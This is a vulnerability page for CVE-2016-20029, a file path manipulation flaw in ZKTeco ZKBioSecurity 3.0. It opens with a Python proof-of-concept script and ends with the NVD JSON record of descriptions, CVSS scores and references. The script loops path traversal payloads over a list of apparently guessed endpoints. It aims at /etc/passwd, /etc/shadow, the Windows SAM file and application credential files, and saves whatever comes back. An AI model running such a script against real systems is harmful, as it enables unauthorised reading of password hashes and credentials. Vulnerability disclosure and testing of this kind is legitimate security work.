CVE-2016-20029

#!/usr/bin/env python3 """ CVE-2016-20029 - ZKTeco ZKBioSecurity 3.0 File Path Manipulation PoC Author: Security Researcher Reference: https://www.exploit-db.com/exploits/40326/ """ import requests import sys TARGET_HOST = "http://target-zkbiosecurity.com" def test_file_path_traversal(target): """Test for file path traversal vulnerability""" # Common sensitive files to test test_files = [ # Linux targets ("../../../../etc/passwd", "passwd_file"), ("../../../../etc/shadow", "shadow_file"), ("../../../../../../etc/passwd", "passwd_deep"), # Windows targets ("..\..\..\..\windows\system32\config\sam", "windows_sam"), ("..\..\..\..\windows\win.ini", "windows_ini"), # Application specific files ("../../config/database.conf", "db_config"), ("../../app/config.xml", "app_config"), ("../../../../ZKBioSecurity/config/credential.dat", "zk_creds"), ] # Common vulnerable endpoints endpoints = [ "/download", "/file/download", "/resource/get", "/log/view", "/report/export", "/api/file", ] print(f"[*] Testing {target} for CVE-2016-20029") print(f"[*] Target: {target}") print("=" * 60) for endpoint in endpoints: for file_path, description in test_files: try: # Test with 'file' parameter url = f"{target}{endpoint}" params = {"file": file_path} print(f"\n[~] Testing: {endpoint} with {description}") print(f"[~] Parameter: file={file_path}") response = requests.get(url, params=params, timeout=10, verify=False) if response.status_code == 200: content_type = response.headers.get('Content-Type', '') if 'text' in content_type or 'application' in content_type: if len(response.content) > 0: print(f"[!] VULNERABLE! Received {len(response.content)} bytes") print(f"[+] Content preview: {response.text[:200]}...") # Save to file filename = f"poc_output_{description}.txt" with open(filename, 'w') as f: f.write(response.text) print(f"[+] Saved response to {filename}") return True elif response.status_code == 403: print(f"[-] Access denied (403)") else: print(f"[-] Status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") print("\n[*] Testing complete") return False if __name__ == "__main__": if len(sys.argv) > 1: target = sys.argv[1] else: target = TARGET_HOST print(f"[*] No target specified, using default: {target}") test_file_path_traversal(target)

{"cve": {"id": "CVE-2016-20029", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:49.527", "lastModified": "2026-04-15T14:56:45.970", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "ZKTeco ZKBioSecurity 3.0 contains a file path manipulation vulnerability that allows attackers to access arbitrary files by modifying file paths used to retrieve local resources. Attackers can manipulate path parameters to bypass access controls and retrieve sensitive information including configuration files, source code, and protected application resources."}, {"lang": "es", "value": "ZKTeco ZKBioSecurity 3.0 contiene una vulnerabilidad de manipulación de rutas de archivo que permite a los atacantes acceder a archivos arbitrarios modificando las rutas de archivo utilizadas para recuperar recursos locales. Los atacantes pueden manipular los parámetros de ruta para eludir los controles de acceso y recuperar información sensible, incluyendo archivos de configuración, código fuente y recursos de aplicación protegidos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-276"}]}], "references": [{"url": "https://cxsecurity.com/issue/WLB-2016090001", "source": "[email protected]"}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/116489", "source": "[email protected]"}, {"url": "https://packetstormsecurity.com/files/138570", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/40326/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/zkteco-zkbiosecurity-file-path-manipulation-vulnerability", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5365.php", "source": "[email protected]"}]}}